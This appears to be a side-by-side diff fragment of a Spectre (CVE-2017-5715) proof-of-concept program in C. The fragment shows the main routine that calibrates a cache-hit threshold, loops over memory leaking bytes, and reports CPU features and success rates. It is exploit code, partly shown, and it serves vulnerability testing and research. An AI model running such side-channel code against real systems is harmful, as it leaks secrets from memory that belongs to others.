"\t-j\t\tJSON output\n" "\t-j\t\tJSON output\n"
"\t-t INT\t\tfixed threshold\n", argv[0]); "\t-t INT\t\tfixed threshold\n", argv[0]);
return 1; return 1;
} }
} }
if (argc != optind) if (argc != optind) {
goto usage; goto usage;
}
fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", target = (uint64_t*)malloc(sizeof(uint64_t));
argv[0] + 2, fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5715:\n[?] ", argv[0] + 2, len);
len);
calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold); calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
#ifdef NOCLFLUSH #ifdef NOCLFLUSH
for (i = 0; i < (int)sizeof(cache_flush_array); i++) { for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
cache_flush_array[i] = 1; cache_flush_array[i] = 1;
} }
#endif #endif
//for (i = 0; i < (int)sizeof(array2); i++)
// array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
while (--len >= 0) { while (--len >= 0) {
leak(addr++, value, score, cache_hit_threshold); leak(addr++, value, score, cache_hit_threshold);
if(score[0] == 3 && value[0] > 31 && value[0] < 127) { if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
@ -375,40 +207,37 @@ main(
if (json) { if (json) {
printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2); printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
#ifndef NORDTSCP #ifndef NORDTSCP
printf("\"rdtscp\": true, "); printf("\"rdtscp\": true, ");
#else #else
printf("\"rdtscp\": false, "); printf("\"rdtscp\": false, ");
#endif #endif
#ifndef NOMFENCE #ifndef NOMFENCE
printf("\"mfence\": true, "); printf("\"mfence\": true, ");
#else #else
printf("\"mfence\": false, "); printf("\"mfence\": false, ");
#endif #endif
#ifndef NOCLFLUSH #ifndef NOCLFLUSH
printf("\"clflush\": true "); printf("\"clflush\": true ");
#else #else
printf("\"clflush\": false "); printf("\"clflush\": false ");
#endif #endif
printf("}, "); printf("}, ");
printf("\"threshold\": %d, ", cache_hit_threshold); printf("\"threshold\": %d, ", cache_hit_threshold);
printf("\"success\": %.0f } }", printf("\"success\": %.0f } }", 100 * successes / (float)strlen(secret));
100 * successes / (float)strlen(secret));
} }
fprintf(stderr, "[+] %-27s\t",argv[0] + 2); fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
#ifndef NORDTSCP #ifndef NORDTSCP
fprintf(stderr, "RDTSCP "); fprintf(stderr, "RDTSCP ");
#else #else
fprintf(stderr, "RDTSC "); fprintf(stderr, "RDTSC ");
#endif #endif
#ifndef NOMFENCE #ifndef NOMFENCE
fprintf(stderr, "MFENCE "); fprintf(stderr, "MFENCE ");
#endif #endif
#ifndef NOCLFLUSH #ifndef NOCLFLUSH
fprintf(stderr, "CLFLUSH "); fprintf(stderr, "CLFLUSH ");
#endif #endif
fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n", cache_hit_threshold, 100 * successes / (float)strlen(secret));
cache_hit_threshold,
100 * successes / (float)strlen(secret));
free(target); free(target);
return 0; return 0;
} }